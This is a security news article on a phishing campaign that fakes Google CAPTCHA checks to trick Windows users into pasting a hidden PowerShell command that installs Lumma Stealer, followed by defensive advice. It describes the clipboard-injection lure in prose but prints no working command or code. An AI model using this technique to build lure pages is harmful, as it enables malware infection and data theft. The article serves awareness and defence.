3 min Security

Phishing campaign mimics CAPTCHA to spread malware

Phishing campaign mimics CAPTCHA to spread malware

CloudSEK reveals an advanced method for spreading the Lumma Stealer malware. This is a serious threat to Windows users.

According to TechRadar, this technique uses misleading verification pages to trick users into unknowingly executing malicious commands. Although the campaign primarily targets the spread of Lumma Stealer malware, this method could be adapted to spread a wide range of other malicious software.

The campaign uses trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing websites. Here, modular malware is delivered, with the initial executable file downloading additional components or modules, complicating detection and analysis.

CAPTCHA verification page

The infection begins when victims are lured to phishing websites that mimic legitimate Google CAPTCHA verification pages. Criminals present these pages as a necessary verification step, leading users to believe they are completing a standard security check.

Once the user clicks the Verify button, the attack becomes even more sophisticated. Behind the scenes, a hidden JavaScript function activates a base64-encoded PowerShell command that is copied onto the user’s clipboard without the user noticing.

The phishing page then instructs the user to perform unusual steps. Consider opening the Run dialog box (Win+R) and entering the pasted command.

When one follows the instructions, the PowerShell command is executed in a hidden window, making detection by the victim virtually impossible.

The hidden PowerShell command connects to a remote server to download additional content, such as a text file (a.txt) with instructions to obtain and execute the Lumma Stealer malware. Once the malware is installed on the system, it connects to domains controlled by the attackers. This allows the attackers to compromise the system, steal sensitive data and potentially perform malicious activities.

Proactive defense

Users and organizations must prioritize security awareness and implement proactive defences to counter this phishing campaign.

The deceptive nature of these attacks – disguised as legitimate authentication processes – emphasizes the need to educate users about the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands.

One must train users to recognize phishing tactics, question unexpected CAPTCHA verifications, and question unfamiliar instructions that involve executing system commands.

Robust endpoint protection

Implementing advanced security tools is essential to prevent PowerShell-based attacks. Since the attackers in this campaign rely heavily on PowerShell, organizations must ensure that their security solutions can detect and block activities related to PowerShell.

Tools with behavioural analysis and real-time monitoring can detect unusual command executions and prevent malware from being downloaded and installed.

Organizations should monitor network traffic for suspicious activity. Security teams should pay extra attention to connections to newly registered or unusual domains, which attackers often use to spread malware or steal sensitive data.

Updating systems with the latest patches is a crucial defence measure. Regular updates fix known vulnerabilities, reducing the opportunities for attackers to exploit outdated software to spread malware such as Lumma Stealer.